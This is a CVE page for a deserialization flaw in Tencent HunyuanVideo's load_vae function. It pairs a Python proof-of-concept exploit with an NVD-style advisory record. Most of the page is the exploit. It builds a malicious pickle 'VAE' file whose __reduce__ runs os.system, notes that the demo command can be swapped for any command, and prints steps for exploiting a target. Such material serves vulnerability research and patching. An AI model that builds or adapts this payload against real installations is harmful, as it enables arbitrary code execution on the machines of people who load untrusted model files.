CVE-2025-13710

#!/usr/bin/env python3 # CVE-2025-13710 PoC - HunyuanVideo load_vae Deserialization RCE # This PoC demonstrates the deserialization vulnerability in Tencent HunyuanVideo's load_vae function import pickle import base64 import os import sys class Exploit: """ Malicious class for deserialization attack Executes arbitrary command when unpickled """ def __reduce__(self): # Replace 'id' with any command to execute cmd = "id > /tmp/pwned.txt" return (os.system, (cmd,)) def generate_malicious_payload(): """Generate malicious pickle payload""" payload = pickle.dumps(Exploit()) return base64.b64encode(payload).decode('utf-8') def create_evil_vae_file(output_path="malicious_vae.pkl"): """Create malicious VAE model file for exploitation""" evil_data = { "vae_type": "malicious", "model_path": "/tmp/evil_model.bin", "config": { "pretrained_model": generate_malicious_payload(), "load_vae": True } } with open(output_path, 'wb') as f: pickle.dump(evil_data, f) print(f"[+] Created malicious VAE file: {output_path}") print(f"[+] Payload (base64): {generate_malicious_payload()}") return output_path def simulate_vulnerable_load_vae(data): """ Simulates vulnerable load_vae function behavior Directly deserializes untrusted data without validation """ print("[*] Loading VAE model...") print(f"[*] Data type: {type(data)}") # VULNERABLE: Direct unpickling without validation if isinstance(data, dict) and 'config' in data: if 'pretrained_model' in data['config']: model_data = data['config']['pretrained_model'] if isinstance(model_data, str): model_data = base64.b64decode(model_data) # This line triggers the RCE result = pickle.loads(model_data) print("[+] Model loaded successfully") return result return None if __name__ == "__main__": print("=" * 60) print("CVE-2025-13710 HunyuanVideo load_vae RCE PoC") print("=" * 60) # Generate the exploit malicious_file = create_evil_vae_file() print("\n[*] To exploit:") print(f"[*] 1. Load the malicious VAE file: {malicious_file}") print("[*] 2. The malicious code will execute during load_vae") print("[*] 3. Check /tmp/pwned.txt for proof of execution") # Demonstration (uncomment to test in safe environment) # with open(malicious_file, 'rb') as f: # evil_data = pickle.load(f) # simulate_vulnerable_load_vae(evil_data)

{"cve": {"id": "CVE-2025-13710", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:45.700", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tencent HunyuanVideo load_vae Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent HunyuanVideo. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the load_vae function.The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27186."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/Tencent-Hunyuan/HunyuanVideo/commit/b47e10b95483aa8458b64d23350844c29e91c408", "source": "[email protected]"}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1030/", "source": "[email protected]"}]}}